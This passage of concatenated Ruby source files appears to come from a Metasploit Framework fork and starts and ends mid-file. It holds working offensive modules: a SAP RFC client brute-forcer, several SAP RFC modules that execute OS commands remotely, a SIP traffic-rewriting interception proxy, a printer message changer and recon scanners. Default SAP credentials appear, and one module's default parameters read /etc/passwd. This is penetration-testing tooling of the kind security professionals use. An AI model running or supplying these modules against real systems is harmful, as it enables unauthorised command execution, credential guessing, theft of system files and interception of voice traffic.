| print_error("Message invalid. Max 16 characters and no quotation marks.") 68 | return 69 | end 70 | 71 | print_status("Connecting to #{ip}:#{port}...") 72 | 73 | conn = connect 74 | 75 | # Format of PJL Commands - #4 76 | # 77 | # @PJL command [command modifier : value] [option name [= value]] [] 78 | # This format is used for all of the other PJL commands. 79 | # The PJL prefix .@PJL. always must be uppercase. 80 | prefix = "@PJL " 81 | postfix = "\r\n" 82 | 83 | # RDYMSG specifies a "ready message" that replaces the "00 READY" 84 | # message on the printer control panel. The RDYMSG command does 85 | # not affect the online state. 86 | command = 'RDYMSG DISPLAY = "' + message + '"' 87 | 88 | req = prefix + command + postfix 89 | 90 | vprint_status("Sending request to #{ip}: #{req.chop}") 91 | 92 | conn.put(req) 93 | 94 | # Using RDYMSG command we cannot wait for an answer.. so we go away! 95 | print_status("Now you can manually verify on printer control panel.") 96 | 97 | disconnect 98 | end 99 | end 100 | -------------------------------------------------------------------------------- /modules/auxiliary/http/vhost_finder.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id: http_version.rb 9579 2010-06-22 01:39:43Z egypt $ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | require 'msf/core' 12 | require 'anemone/http' 13 | 14 | 15 | class Metasploit3 < Msf::Auxiliary 16 | 17 | include Msf::Auxiliary::Report 18 | 19 | def initialize 20 | super( 21 | 'Name' => 'VHOST finder using Bing.', 22 | 'Description' => %q{Find all VHOST's belongs to particular IP(s) using Bing. 23 | Without setting BING_API_KEY module makes simple query to bing.com and parses results. 24 | Keep in mind that returned results from Bing API are usually limited compare to these 25 | obtained from bing.com}, 26 | 'Version' => '$Revision:$', 27 | 'Author' => 'Marcin \'Icewall\' Noga ', 28 | 'License' => MSF_LICENSE 29 | ) 30 | 31 | register_options( 32 | [ 33 | OptAddressRange.new('IPRANGE',[true,'The IP or address range for which you want to check vhosts.','']), 34 | OptString.new('BING_API_KEY',[false,'Set Bing API Key to use API interface.','']), 35 | OptBool.new('FULL_URL',[false,'Display all found URLs related with specific IP(s). When this option is set to false only domains will be displayed.',false]) 36 | ],self.class) 37 | end 38 | 39 | def init() 40 | @vhosts = [] #array contains found vhosts 41 | @key = datastore['BING_API_KEY'] 42 | @offset = 0 43 | if @key.empty? #Simple Bing search settings 44 | @amount = 10 #amount of results per page (in this mode without setting special cookie u can't increase this value) 45 | @url = "http://www.bing.com/search?q=ip:%s&first=%d" #base url 46 | @rule = /

(.*?)<\/web:Url>/ 51 | end 52 | end 53 | 54 | def run() 55 | init() 56 | ip_range = Rex::Socket::RangeWalker.new(datastore['IPRANGE']) 57 | while(true) 58 | @ip = ip_range.next_ip() 59 | break if not @ip 60 | find_vhosts() 61 | #check whether result should only contains domains 62 | remove_duplicates() if not datastore['FULL_URL'] 63 | print_status("VHOSTS for #{@ip}:") 64 | #sort results and report them 65 | @vhosts.sort!.each do |item| 66 | print_good(item) 67 | uri = URI(URI.encode(item)) 68 | report_web_site( 69 | :host => @ip, 70 | :vhost => uri.host, 71 | :port => uri.port 72 | ) 73 | end 74 | reset() 75 | end 76 | end 77 | 78 | def find_vhosts() 79 | http = Anemone::HTTP.new() 80 | begin 81 | page = http.fetch_page( get_url() ) 82 | @vhosts += page.body.scan(@rule) 83 | end while (next?(page.body)) 84 | #just make sure vhosts array is flat 85 | return @vhosts.flatten! 86 | end 87 | 88 | def next?(body) 89 | if @key.empty? 90 | flag = body.include?("class=\"sb_pagN\"")#simple check whether 'Next' page url exists 91 | else 92 | total = body.match(/(.*?)<\/web:Total>/)[1].to_i 93 | flag = (total > @offset + @amount) 94 | end 95 | @offset += @amount 96 | return flag 97 | end 98 | 99 | def remove_duplicates() 100 | @vhosts = @vhosts.collect do |url| 101 | uri = URI(URI.encode(url)) #encode url first to avoid errors 102 | "%s://%s" % [uri.scheme,uri.host] 103 | end 104 | #we are interested only in uniq domains 105 | @vhosts.uniq! 106 | end 107 | 108 | def get_url() 109 | if @key.empty?#return proper url for simple search 110 | return @url % [@ip,@offset] 111 | end 112 | #return proper url for Bing_api 113 | return @url % [@key,@ip,@amount,@offset] 114 | end 115 | def reset() 116 | @vhosts.clear() 117 | @offset = 0 118 | end 119 | end 120 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/sap/sap_rfc_client_enum.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http//metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | ## 7 | # This module is based on, inspired by, or is a port of a plugin 8 | # available in the Onapsis Bizploit Opensource ERP Penetration Testing 9 | # framework - http://www.onapsis.com/research-free-solutions.php. 10 | # Mariano Nunez (the author of the Bizploit framework) helped me in my 11 | # efforts in producing the Metasploit modules and was happy to share his 12 | # knowledge and experience - a very cool guy. 13 | # 14 | # The following guys from ERP-SCAN deserve credit for their 15 | # contributions Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry 16 | # Chastukhin and Dmitry Evdokimov. 17 | # 18 | # I'd also like to thank Chris John Riley, Ian de Villiers and Joris van 19 | # de Vis who have Beta tested the modules and provided excellent 20 | # feedback. Some people just seem to enjoy hacking SAP :) 21 | ## 22 | 23 | require 'msf/core' 24 | require 'msf/core/exploit/sap' 25 | 26 | class Metasploit4 < Msf::Auxiliary 27 | 28 | include Msf::Exploit::SAP::RFC 29 | include Msf::Auxiliary::Report 30 | include Msf::Auxiliary::Scanner 31 | 32 | def initialize 33 | super( 34 | 'Name' => 'SAP RFC Client Enumerator', 35 | 'Description' => %q{ 36 | This module attempts to brute force the available SAP clients via the RFC interface. 37 | Default clients can be tested without needing to set a CLIENT. 38 | This module can execute through a SAP Router if SRHOST and SRPORT values are set. 39 | The module requires the NW RFC SDK from SAP as well as the Ruby wrapper nwrfc (http://rubygems.org/gems/nwrfc). 40 | }, 41 | 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]], 42 | 'Author' => [ 'nmonkee' ], 43 | 'License' => BSD_LICENSE 44 | ) 45 | 46 | register_options( 47 | [ 48 | OptString.new('CLIENT', [true, 'Client can be single (066), comma separated list (000,001,066) or range (000-999)', '000,001,066']), 49 | ], self.class) 50 | end 51 | 52 | def run_host(rhost) 53 | user = Rex::Text.rand_text_alpha(8) 54 | password = Rex::Text.rand_text_alpha(8) 55 | rport = datastore['RPORT'] 56 | 57 | saptbl = Msf::Ui::Console::Table.new( 58 | Msf::Ui::Console::Table::Style::Default, 59 | 'Header' => "[SAP] Clients #{rhost}:#{rport}", 60 | 'Columns' => 61 | [ 62 | "host", 63 | "port", 64 | "client", 65 | ]) 66 | 67 | client_list.each do |client| 68 | vprint_status("#{rhost}:#{rport} [SAP] trying client: #{client}") 69 | begin 70 | login(rhost, rport, client, user, password) do |conn| 71 | saptbl << successful_login(rhost, rport, client, user, password) 72 | end 73 | rescue NWError => e 74 | case e.code 75 | when :RFC_COMMUNICATION_FAILURE 76 | break 77 | when :RFC_LOGON_FAILURE 78 | case e.message 79 | when /Name or password is incorrect/i 80 | saptbl << successful_login(rhost, rport, client, user, password) 81 | end 82 | end 83 | end 84 | end 85 | 86 | if saptbl.rows.count > 0 87 | print(saptbl.to_s) 88 | end 89 | end 90 | 91 | def successful_login(rhost, rport, client, user, password) 92 | print_good("#{rhost}:#{rport} [SAP] client found: #{client}") 93 | report_auth_info( 94 | :host => rhost, 95 | :sname => 'sap-gateway', 96 | :proto => 'tcp', 97 | :port => rport, 98 | :client => client, 99 | :user => user, 100 | :pass => password, 101 | :sysnr => system_number(rport), 102 | :source_type => 'user_supplied', 103 | :target_host => rhost, 104 | :target_port => rport 105 | ) 106 | 107 | [rhost, rport, client] 108 | end 109 | end 110 | 111 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/sap/sap_rfc_dbmcli_sxpg_command_exec.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http//metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | ## 7 | # This module is based on, inspired by, or is a port of a plugin 8 | # available in the Onapsis Bizploit Opensource ERP Penetration Testing 9 | # framework - http://www.onapsis.com/research-free-solutions.php. 10 | # Mariano Nunez (the author of the Bizploit framework) helped me in my 11 | # efforts in producing the Metasploit modules and was happy to share his 12 | # knowledge and experience - a very cool guy. 13 | # 14 | # The following guys from ERP-SCAN deserve credit for their 15 | # contributions Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry 16 | # Chastukhin and Dmitry Evdokimov. 17 | # 18 | # I'd also like to thank Chris John Riley, Ian de Villiers and Joris van 19 | # de Vis who have Beta tested the modules and provided excellent 20 | # feedback. Some people just seem to enjoy hacking SAP :) 21 | ## 22 | 23 | require 'msf/core' 24 | require 'msf/core/exploit/sap' 25 | 26 | class Metasploit4 < Msf::Auxiliary 27 | 28 | include Msf::Exploit::SAP::RFC 29 | include Msf::Auxiliary::Report 30 | include Msf::Auxiliary::Scanner 31 | 32 | def initialize 33 | super( 34 | 'Name' => 'SAP RFC DBMCLI SXPG_COMMAND_EXEC', 35 | 'Description' => %q{ 36 | This module makes use of the SXPG_COMMAND_EXEC Remote Function Call to execute OS commands as configured in SM69. 37 | It uses the DBMCLI parameter injection to write OS commands to a file for execution. 38 | The module requires the NW RFC SDK from SAP as well as the Ruby wrapper nwrfc (http://rubygems.org/gems/nwrfc). 39 | }, 40 | 'References' => [[ 'URL', 'https://labs.mwrinfosecurity.com/blog/2012/09/03/sap-parameter-injection/' ]], 41 | 'Author' => [ 'nmonkee' ], 42 | 'License' => BSD_LICENSE, 43 | ) 44 | 45 | register_options( 46 | [ 47 | OptString.new('USERNAME', [true, 'Username', 'SAP*']), 48 | OptString.new('PASSWORD', [true, 'Password', '06071992']), 49 | OptString.new('CMD', [true, 'Command', 'id']), 50 | OptEnum.new('OS', [true, 'Target OS','Linux',['Linux', 'Windows']]) 51 | ], self.class) 52 | end 53 | 54 | def run_host(rhost) 55 | user = datastore['USERNAME'] 56 | password = datastore['PASSWORD'] 57 | unless datastore['CLIENT'] =~ /^\d{3}\z/ 58 | fail_with(Exploit::Failure::BadConfig, "CLIENT in wrong format") 59 | end 60 | 61 | opts = { 62 | :rhost => rhost, 63 | :rport => rport, 64 | :client => client, 65 | :user => user, 66 | :pass => password 67 | } 68 | 69 | res = dbmcli_sxpg_execute(datastore['OS'], datastore['CMD'], opts) 70 | 71 | print res 72 | end 73 | 74 | end 75 | 76 | 77 | 78 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/sap/sap_rfc_python_sxpg_command_exec.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http//metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | ## 7 | # This module is based on, inspired by, or is a port of a plugin 8 | # available in the Onapsis Bizploit Opensource ERP Penetration Testing 9 | # framework - http://www.onapsis.com/research-free-solutions.php. 10 | # Mariano Nunez (the author of the Bizploit framework) helped me in my 11 | # efforts in producing the Metasploit modules and was happy to share his 12 | # knowledge and experience - a very cool guy. 13 | # 14 | # The following guys from ERP-SCAN deserve credit for their 15 | # contributions Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry 16 | # Chastukhin and Dmitry Evdokimov. 17 | # 18 | # I'd also like to thank Chris John Riley, Ian de Villiers and Joris van 19 | # de Vis who have Beta tested the modules and provided excellent 20 | # feedback. Some people just seem to enjoy hacking SAP :) 21 | ## 22 | 23 | require 'msf/core' 24 | require 'msf/core/exploit/sap' 25 | 26 | class Metasploit4 < Msf::Auxiliary 27 | 28 | include Msf::Exploit::SAP::RFC 29 | include Msf::Auxiliary::Report 30 | include Msf::Auxiliary::Scanner 31 | 32 | def initialize 33 | super( 34 | 'Name' => 'SAP RFC X_PYTHON SXPG_COMMAND_EXEC', 35 | 'Description' => %q{ 36 | This module makes use of the SXPG_COMMAND_EXEC Remote Function Call to execute OS commands as configured in SM69. 37 | It uses the X_PYTHON library to execute the command and returns the call output plus the exit code. 38 | The module requires the NW RFC SDK from SAP as well as the Ruby wrapper nwrfc (http://rubygems.org/gems/nwrfc). 39 | }, 40 | 'References' => [[ 'URL', 'https://labs.mwrinfosecurity.com/' ]], 41 | 'Author' => [ 'Ben Campbell', 'nmonkee' ], 42 | 'License' => MSF_LICENSE, 43 | ) 44 | 45 | register_options( 46 | [ 47 | OptString.new('USERNAME', [true, 'Username', 'SAP*']), 48 | OptString.new('PASSWORD', [true, 'Password', '06071992']), 49 | OptString.new('CMD', [true, 'Command', 'id']), 50 | ], self.class) 51 | end 52 | 53 | def run_host(rhost) 54 | res = nil 55 | user = datastore['USERNAME'] 56 | password = datastore['PASSWORD'] 57 | unless datastore['CLIENT'] =~ /^\d{3}\z/ 58 | fail_with(Exploit::Failure::BadConfig, "CLIENT in wrong format") 59 | end 60 | 61 | cmd = encode_command_python(datastore['CMD']) 62 | exec = encode_python(cmd) 63 | 64 | if exec.length > 255 65 | # do python stager to file like exploit if needed 66 | print_error("#{rhost}:#{rport} [SAP] Encoded command length must not exceed 255 characters - #{exec.length}") 67 | else 68 | opts = { 69 | :OPERATINGSYSTEM => 'ANYOS', 70 | :COMMANDNAME => 'X_PYTHON', 71 | :ADDITIONAL_PARAMETERS => exec 72 | } 73 | 74 | login(rhost, rport, client, user, password) do |conn| 75 | res = sxpg_command_execute(conn, opts) 76 | end 77 | end 78 | 79 | if res 80 | print_line res 81 | else 82 | print_error("#{rhost}:#{rport} [SAP] No response from cmd '#{datastore['CMD']}'") 83 | end 84 | end 85 | 86 | end 87 | 88 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/sap/sap_rfc_sxpg_call_system.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http//metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | ## 7 | # This module is based on, inspired by, or is a port of a plugin 8 | # available in the Onapsis Bizploit Opensource ERP Penetration Testing 9 | # framework - http://www.onapsis.com/research-free-solutions.php. 10 | # Mariano Nunez (the author of the Bizploit framework) helped me in my 11 | # efforts in producing the Metasploit modules and was happy to share his 12 | # knowledge and experience - a very cool guy. 13 | # 14 | # The following guys from ERP-SCAN deserve credit for their 15 | # contributions Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry 16 | # Chastukhin and Dmitry Evdokimov. 17 | # 18 | # I'd also like to thank Chris John Riley, Ian de Villiers and Joris van 19 | # de Vis who have Beta tested the modules and provided excellent 20 | # feedback. Some people just seem to enjoy hacking SAP :) 21 | ## 22 | 23 | require 'msf/core' 24 | require 'msf/core/exploit/sap' 25 | 26 | class Metasploit4 < Msf::Auxiliary 27 | 28 | include Msf::Exploit::SAP::RFC 29 | include Msf::Auxiliary::Report 30 | include Msf::Auxiliary::Scanner 31 | 32 | def initialize 33 | super( 34 | 'Name' => 'SAP RFC SXPG_CALL_SYSTEM', 35 | 'Description' => %q{ 36 | This module makes use of the SXPG_CALL_SYSTEM Remote Function Call to execute OS commands as configured in SM69. 37 | The module requires the NW RFC SDK from SAP as well as the Ruby wrapper nwrfc (http://rubygems.org/gems/nwrfc). 38 | }, 39 | 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]], 40 | 'Author' => [ 'nmonkee' ], 41 | 'License' => BSD_LICENSE, 42 | 'DefaultOptions' => { 43 | 'CLIENT' => "000" 44 | } 45 | ) 46 | 47 | register_options( 48 | [ 49 | OptString.new('USERNAME', [true, 'Username', 'SAP*']), 50 | OptString.new('PASSWORD', [true, 'Password', '06071992']), 51 | OptString.new('CMD', [true, 'Command Name as in SM69', 'ENV']), 52 | OptString.new('PARAM', [false, 'Command Parameters', '']), 53 | ], self.class) 54 | end 55 | 56 | def run_host(rhost) 57 | user = datastore['USERNAME'] 58 | pass = datastore['PASSWORD'] 59 | unless datastore['CLIENT'] =~ /^\d{3}\z/ 60 | fail_with(Exploit::Failure::BadConfig, "CLIENT in wrong format") 61 | end 62 | 63 | res = exec_CMD(user,datastore['CLIENT'],pass,rhost,datastore['RPORT'], datastore['CMD'], datastore['PARAM']) 64 | if res.blank? 65 | print_error("#{rhost}:#{rport} [SAP] No output returned") 66 | else 67 | print res 68 | end 69 | end 70 | 71 | def exec_CMD(user, client, password, rhost, rport, cmd, param) 72 | data = nil 73 | param = '' unless param 74 | 75 | login(rhost, rport, client, user, password) do |conn| 76 | conn.connection_info 77 | begin 78 | data = sxpg_call_system(conn, {:COMMANDNAME => cmd, :ADDITIONAL_PARAMETERS => param}) 79 | rescue NWError => e 80 | print_error("#{rhost}:#{rport} [SAP] #{e.code} - #{e.message}") 81 | end 82 | end 83 | 84 | data 85 | end 86 | end 87 | 88 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/sap/sap_rfc_sxpg_command_exec.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http//metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | ## 7 | # This module is based on, inspired by, or is a port of a plugin 8 | # available in the Onapsis Bizploit Opensource ERP Penetration Testing 9 | # framework - http://www.onapsis.com/research-free-solutions.php. 10 | # Mariano Nunez (the author of the Bizploit framework) helped me in my 11 | # efforts in producing the Metasploit modules and was happy to share his 12 | # knowledge and experience - a very cool guy. 13 | # 14 | # The following guys from ERP-SCAN deserve credit for their 15 | # contributions Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry 16 | # Chastukhin and Dmitry Evdokimov. 17 | # 18 | # I'd also like to thank Chris John Riley, Ian de Villiers and Joris van 19 | # de Vis who have Beta tested the modules and provided excellent 20 | # feedback. Some people just seem to enjoy hacking SAP :) 21 | ## 22 | 23 | require 'msf/core' 24 | require 'msf/core/exploit/sap' 25 | 26 | class Metasploit4 < Msf::Auxiliary 27 | 28 | include Msf::Exploit::SAP::RFC 29 | include Msf::Auxiliary::Report 30 | include Msf::Auxiliary::Scanner 31 | 32 | def initialize 33 | super( 34 | 'Name' => 'SAP RFC SXPG_COMMAND_EXECUTE', 35 | 'Description' => %q{ 36 | This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call to execute OS commands as configured in SM69. 37 | The module requires the NW RFC SDK from SAP as well as the Ruby wrapper nwrfc (http://rubygems.org/gems/nwrfc). 38 | }, 39 | 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]], 40 | 'Author' => [ 'nmonkee' ], 41 | 'License' => BSD_LICENSE, 42 | 'DefaultOptions' => { 'CLIENT' => '000' } 43 | ) 44 | 45 | register_options( 46 | [ 47 | OptString.new('USERNAME', [true, 'Username', 'SAP*']), 48 | OptString.new('PASSWORD', [true, 'Password', '06071992']), 49 | OptString.new('CMD', [true, 'Command Name as in SM69', 'CAT']), 50 | OptString.new('PARAM', [false, 'Command Parameters', '/etc/passwd']), 51 | OptEnum.new('OS', [true, 'SM69 Target OS','UNIX',['ANYOS', 'UNIX', 'Windows NT', 'AS/400', 'OS/400']]) 52 | ], self.class) 53 | end 54 | 55 | def run_host(rhost) 56 | user = datastore['USERNAME'] 57 | pass = datastore['PASSWORD'] 58 | 59 | unless datastore['CLIENT'] =~ /^\d{3}\z/ 60 | fail_with(Exploit::Failure::BadConfig, "CLIENT in wrong format") 61 | end 62 | 63 | os = datastore['OS'] 64 | 65 | res = exec_CMD(user,datastore['CLIENT'],pass,rhost,datastore['rport'], datastore['CMD'], datastore['PARAM'], os) 66 | if res.blank? 67 | print_error("#{rhost}:#{rport} [SAP] No output returned") 68 | else 69 | print res 70 | end 71 | end 72 | 73 | def exec_CMD(user, client, pass, rhost, rport, cmd, param, os) 74 | data = nil 75 | param = '' unless param 76 | 77 | login(rhost, rport, client, user, pass) do |conn| 78 | conn.connection_info 79 | 80 | begin 81 | data = sxpg_command_execute(conn, 82 | { 83 | :COMMANDNAME => cmd, 84 | :OPERATINGSYSTEM => os, 85 | :ADDITIONAL_PARAMETERS => param 86 | }) 87 | rescue NWError => e 88 | print_error("#{rhost}:#{rport} [SAP] #{e.code} - #{e.message}") 89 | end 90 | end 91 | 92 | data 93 | end 94 | end 95 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/sap/sap_rfc_system.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http//metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | ## 7 | # This module is based on, inspired by, or is a port of a plugin 8 | # available in the Onapsis Bizploit Opensource ERP Penetration Testing 9 | # framework - http://www.onapsis.com/research-free-solutions.php. 10 | # Mariano Nunez (the author of the Bizploit framework) helped me in my 11 | # efforts in producing the Metasploit modules and was happy to share his 12 | # knowledge and experience - a very cool guy. 13 | # 14 | # The following guys from ERP-SCAN deserve credit for their 15 | # contributions Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry 16 | # Chastukhin and Dmitry Evdokimov. 17 | # 18 | # I'd also like to thank Chris John Riley, Ian de Villiers and Joris van 19 | # de Vis who have Beta tested the modules and provided excellent 20 | # feedback. Some people just seem to enjoy hacking SAP :) 21 | ## 22 | 23 | require 'msf/core' 24 | require 'msf/core/exploit/sap' 25 | 26 | class Metasploit4 < Msf::Auxiliary 27 | 28 | include Msf::Exploit::SAP::RFC 29 | include Msf::Auxiliary::Report 30 | include Msf::Auxiliary::Scanner 31 | 32 | def initialize 33 | super( 34 | 'Name' => 'SAP RFC ABAP INSTALL AND RUN Command Execution', 35 | 'Description' => %q{ 36 | This module makes use of the RFC_ABAP_INSTALL_AND_RUN Remote Function Call to execute arbitrary SYSTEM commands. 37 | RFC_ABAP_INSTALL_AND_RUN takes ABAP source lines and executes them. It is common for the the function to be disabled or access revoked in a production system. It is also deprecated. 38 | The module requires the NW RFC SDK from SAP as well as the Ruby wrapper nwrfc (http://rubygems.org/gems/nwrfc). 39 | }, 40 | 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]], 41 | 'Author' => [ 'nmonkee' ], 42 | 'License' => BSD_LICENSE, 43 | 'DefaultOptions' => { 44 | 'CLIENT' => "000" 45 | } 46 | ) 47 | 48 | register_options( 49 | [ 50 | OptString.new('USERNAME', [true, 'Username', 'SAP*']), 51 | OptString.new('PASSWORD', [true, 'Password', '06071992']), 52 | OptString.new('CMD', [true, 'Command to Execute', 'id']), 53 | ], self.class) 54 | end 55 | 56 | def run_host(rhost) 57 | unless datastore['CLIENT'] =~ /^\d{3}\z/ 58 | fail_with(Exploit::Failure::BadConfig, "CLIENT in wrong format") 59 | end 60 | command = datastore['CMD'] 61 | login(rhost, rport, client, datastore['USERNAME'], datastore['PASSWORD']) do |conn| 62 | begin 63 | data = rfc_abap_install_and_run_cmd(conn, command) 64 | print_good("#{rhost}:#{rport} [SAP] Executed #{command}") 65 | print_line(data) 66 | rescue NWError => e 67 | print_error("#{rhost}:#{rport} [SAP] #{e.code} - #{e.message}") 68 | end 69 | end 70 | end 71 | 72 | end 73 | 74 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/sip/vsipoptions.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This file is part of the Metasploit Framework and may be subject to 3 | # redistribution and commercial restrictions. Please see the Metasploit 4 | # Framework web site for more information on licensing and terms of use. 5 | # http://metasploit.com/framework/ 6 | ## 7 | 8 | 9 | require 'msf/core' 10 | require 'digest/md5' 11 | 12 | class Metasploit3 < Msf::Auxiliary 13 | 14 | include Msf::Auxiliary::Report 15 | include Msf::Auxiliary::Scanner 16 | include Msf::Auxiliary::SIP 17 | 18 | def initialize 19 | super( 20 | 'Name' => 'SIP Options Discovery (UDP)', 21 | 'Version' => '1', 22 | 'Description' => 'Options Discovery Module for SIP Services', 23 | 'Author' => 'Fatih Ozavci ', 24 | 'License' => MSF_LICENSE 25 | ) 26 | 27 | register_options( 28 | [ 29 | OptString.new('REALM', [ true, "The login realm to probe at each host", "realm.com.tr"]), 30 | OptString.new('TO', [ true, "The destination username to probe at each host", "100"]), 31 | OptString.new('FROM', [ true, "The source username to probe at each host", "100"]), 32 | Opt::RPORT(5060), 33 | Opt::CHOST, 34 | Opt::CPORT(5065) 35 | ], self.class) 36 | 37 | register_advanced_options( 38 | [ 39 | OptBool.new('DEBUG', [ false, "Verbose Level", false]), 40 | OptBool.new('VERBOSE', [ false, "Verbose Level", false]) 41 | ], self.class) 42 | end 43 | 44 | 45 | def run_host(dest_addr) 46 | 47 | udp_sock = nil 48 | 49 | realm = datastore['REALM'] 50 | from = datastore['FROM'] 51 | to = datastore['TO'] 52 | listen_addr = datastore['CHOST'] 53 | listen_port = datastore['CPORT'].to_i 54 | dest_port = datastore['RPORT'].to_i 55 | 56 | 57 | 58 | start_sipsrv(listen_port,listen_addr,dest_port,dest_addr) 59 | 60 | result,rdata,rdebug,rawdata = send_options( 61 | 'realm' => realm, 62 | 'from' => from, 63 | 'to' => to 64 | ) 65 | 66 | case result 67 | when :received 68 | report = "#{rdata['source']}\tResponse: #{rdata['resp_msg'].split(" ")[1,5].join(" ")}\n" 69 | report <<"Server \t: #{rdata['server']}\n" if rdata['server'] 70 | report << "User-Agent \t: #{rdata['agent']}\n" if rdata['agent'] 71 | print_good(report) 72 | 73 | report_auth_info( 74 | :host => dest_addr, 75 | :port => datastore['RPORT'], 76 | :sname => 'sip', 77 | :proof => nil, 78 | :source_type => "user_supplied", 79 | :active => true 80 | ) 81 | else 82 | vprint_status("#{dest_addr}:#{dest_port} : #{convert_error(result)}") 83 | end 84 | 85 | #Debug 86 | if datastore['DEBUG'] == true 87 | if rdata !=nil 88 | report = "#{rdata['source']}\tresponse: #{rdata['resp_msg'].split(" ")[1,5].join(" ")}\n" 89 | report <<"Server \t: #{rdata['server']}\n" if rdata['server'] 90 | report <<"User-Agent \t: #{rdata['agent']}\n" if rdata['agent'] 91 | report <<"Realm \t: #{rdata['digest']['realm']}\n" if rdata['digest'] 92 | print_debug(report) 93 | end 94 | 95 | rawdata.split("\n").each { |r| print_debug("Response Details: #{r}") } if rdata != nil 96 | rdebug.each { |r| print_debug("Irrelevant Responses : #{r['resp']} #{r['resp_msg']}") } if rdebug 97 | end 98 | end 99 | end 100 | 101 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/sip/vsipproxy.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This file is part of the Metasploit Framework and may be subject to 3 | # redistribution and commercial restrictions. Please see the Metasploit 4 | # Framework web site for more information on licensing and terms of use. 5 | # http://metasploit.com/framework/ 6 | ## 7 | 8 | 9 | require 'msf/core' 10 | require 'rex/proto/sip' 11 | 12 | class Metasploit3 < Msf::Auxiliary 13 | 14 | include Msf::Auxiliary::Report 15 | include Msf::Auxiliary::SIP 16 | 17 | def initialize 18 | super( 19 | 'Name' => 'SIP Proxy with Auto Replace Support', 20 | 'Version' => '$Revision$', 21 | 'Description' => 'SIP Proxy with Auto Replace Support', 22 | 'Author' => 'Fatih Ozavci ', 23 | 'License' => MSF_LICENSE 24 | ) 25 | 26 | deregister_options('RHOST','RHOSTS','RPORT') 27 | register_options( 28 | [ 29 | OptAddress.new('PRXCLT_IP', [true, 'Local IP of SIP Server for Client']), 30 | OptInt.new('PRXCLT_PORT', [true, 'Local UDP Port of SIP Server for Client',5061]), 31 | OptAddress.new('PRXSRV_IP', [true, 'Local IP of SIP Server for Server']), 32 | OptInt.new('PRXSRV_PORT', [true, 'Local UDP Port of SIP Server for Server',5060]), 33 | OptAddress.new('CLIENT_IP', [true, 'IP of SIP Client']), 34 | OptInt.new('CLIENT_PORT', [true, 'Port of SIP Client',5060]), 35 | OptAddress.new('SERVER_IP', [true, 'IP of Remote SIP Server']), 36 | OptInt.new('SERVER_PORT', [true, 'Port of Remote SIP Server',5060]), 37 | OptPath.new('CONF_FILE', [ false, "File containing Replacements, one per line", 38 | #File.join(Msf::Config.install_root, "data", "wordlists", "sipproxy_replace.txt") ]), 39 | File.join("/", "tmp", "sipproxy_replace.txt") ]), 40 | OptBool.new('LOG', [ true, "Logging for Requests and Responses", false]), 41 | ], self.class) 42 | 43 | register_advanced_options( 44 | [ 45 | OptBool.new('DEBUG', [ false, "Verbose Level", false]), 46 | OptBool.new('VERBOSE', [ false, "Verbose Level", false]) 47 | ], self.class) 48 | end 49 | 50 | def run 51 | client_ip = datastore['CLIENT_IP'] 52 | client_port = datastore['CLIENT_PORT'] 53 | server_ip = datastore['SERVER_IP'] 54 | server_port = datastore['SERVER_PORT'] 55 | 56 | prxclient_ip = datastore['PRXCLT_IP'] 57 | prxclient_port = datastore['PRXCLT_PORT'] 58 | prxserver_ip = datastore['PRXSRV_IP'] 59 | prxserver_port = datastore['PRXSRV_PORT'] 60 | 61 | 62 | start_sipprx(prxclient_port,prxclient_ip,client_port,client_ip,prxserver_port,prxserver_ip,server_port,server_ip) 63 | set_replacefile(datastore['CONF_FILE']) if datastore['CONF_FILE'] 64 | set_logfile(File.join("/", "tmp", "sipproxylog-#{rand(0x10000000)}.log")) if datastore['LOG'] 65 | start_monitor 66 | 67 | begin 68 | # Wait for finish... 69 | while self.thread.alive? 70 | select(nil, nil, nil, 2) 71 | end 72 | rescue 73 | nil 74 | ensure 75 | stop 76 | end 77 | end 78 | 79 | end 80 | -------------------------------------------------------------------------------- /modules/auxiliary/securestate/proxy_config.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | require 'msf/core' 